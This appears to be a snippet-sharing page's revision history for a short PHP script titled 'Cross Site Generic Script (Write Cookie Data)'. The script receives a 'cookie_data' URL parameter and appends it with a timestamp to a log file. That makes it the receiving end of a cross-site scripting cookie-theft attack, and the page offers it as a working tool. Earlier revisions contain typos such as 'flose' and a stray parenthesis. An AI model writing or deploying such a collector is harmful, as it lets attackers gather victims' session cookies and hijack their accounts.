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Revision: 7099
at July 18, 2008 18:42 by section31

Updated Code
$contents = isset($_GET['cookie_data']) && trim($_GET['cookie_data']) && strlen($_GET['cookie_data']) < 512 ? $_GET['cookie_data'] : die('invalid request');

$fp = fopen('cookie_log.txt', 'a');
$fp and fwrite($fp, date("D M j g:i a") . ' : ' . $contents . "\n") and fclose($fp);

Revision: 7098
at July 18, 2008 18:41 by section31

Updated Code
$contents = isset($_GET['cookie_data']) && trim($_GET['cookie_data']) && strlen($_GET['cookie_data']) < 512 ? $_GET['cookie_data'] : die('invalid request');

$fp = fopen('cookie_log.txt', 'a');
$fp and fwrite($fp, date("D M j g:i a") . ' : ' . $contents . "\n") and flose($fp);

Revision: 7097
at July 6, 2008 01:04 by section31

Initial Code
$contents = isset($_GET['cookie_data']) && trim($_GET['cookie_data']) && strlen($_GET['cookie_data']) < 512) ? $_GET['cookie_data'] : die('invalid request');

$fp = fopen('cookie_log.txt', 'a');
$fp and fwrite($fp, date("D M j g:i a") . ' : ' . $contents . "\n") and flose($fp);

Initial URL

Initial Description
This is linked to this

Initial Title
Cross Site Generic Script (Write Cookie Data)

Initial Tags

Initial Language